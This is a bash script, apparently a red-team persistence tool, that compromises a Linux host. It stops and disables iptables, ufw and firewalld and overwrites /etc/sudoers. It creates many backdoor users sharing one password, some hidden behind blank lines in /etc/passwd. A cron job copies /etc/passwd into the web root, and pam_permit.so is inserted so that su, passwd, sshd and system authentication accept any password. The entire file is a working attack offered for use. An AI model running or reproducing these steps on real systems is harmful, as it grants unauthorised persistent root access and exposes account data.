#!/bin/bash

#disable firewalls
fire() {
	systemctl stop iptables
	systemctl stop ufw
	systemctl stop firewalld
	
	systemctl disable iptables
	systemctl disable ufw
	systemctl disable firewalld
	
	service iptables stop
	service ufw stop
	service firewalld stop
	
	chkconfig iptables off
	chkconfig ufw off
	chkconfig firewalld off
}


#add users and deploy bad sudo files
usr() {
	cp sudoers /etc/sudoers
	mkdir /etc/bestsudo.d/
	cp bsudo /etc/bestsudo.d/
	groupadd bestsudo
	useradd -m -G bestsudo -p winter.2019 tom
	useradd -m -G bestsudo -p winter.2019 seth
	useradd -m -G bestsudo -p winter.2019 josh
	useradd -m -G bestsudo -p winter.2019 caine
	useradd -m -G bestsudo -p winter.2019 russ
	useradd -m -G bestsudo -p winter.2019 ben
	useradd -m -G bestsudo -p winter.2019 ryan
	useradd -m -G bestsudo -p winter.2019 evan
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	echo "" >> /etc/passwd
	useradd -m -G bestsudo -p winter.2019 ian
	useradd -m -G bestsudo -p winter.2019 yourmom
	useradd -m -G bestsudo -p winter.2019 mymomlol
	useradd -m -G bestsudo -p winter.2019 sys_scr
	useradd -m -G bestsudo -p winter.2019 dontdeleteme
	useradd -m -G bestsudo -p winter.2019 hellodarknessmyoldfriend
	useradd -m -G bestsudo -p winter.2019 rmrf
	useradd -m -G bestsudo -p winter.2019 cats
	useradd -m -G bestsudo -p winter.2019 morecats
	return
}

# adds some cronjobs
cron(){
	echo "15 * * * * root cp /etc/passwd /var/www/html/" >> /etc/crontab
	echo "15 * * * * root wall 'ERROR 42:Its getting dark and my battery is low' " >> /etc/crontab
	return
}

# disables password requirements for su, passwd, sshd, and system wide authentication
pam(){
	sed -i "2i auth		sufficient		pam_permit.so" /etc/pam.d/su
	sed -i "2i auth		sufficient		pam_permit.so" /etc/pam.d/passwd
	sed -i "2i auth		sufficient		pam_permit.so" /etc/pam.d/sshd
	sed -i "2i auth		sufficient		pam_permit.so" /etc/pam.d/system-auth
	sed -i "2i auth		sufficient		pam_permit.so" /etc/pam.d/common-auth
	return
}

fire
usr
pam
cron
echo "All done!"
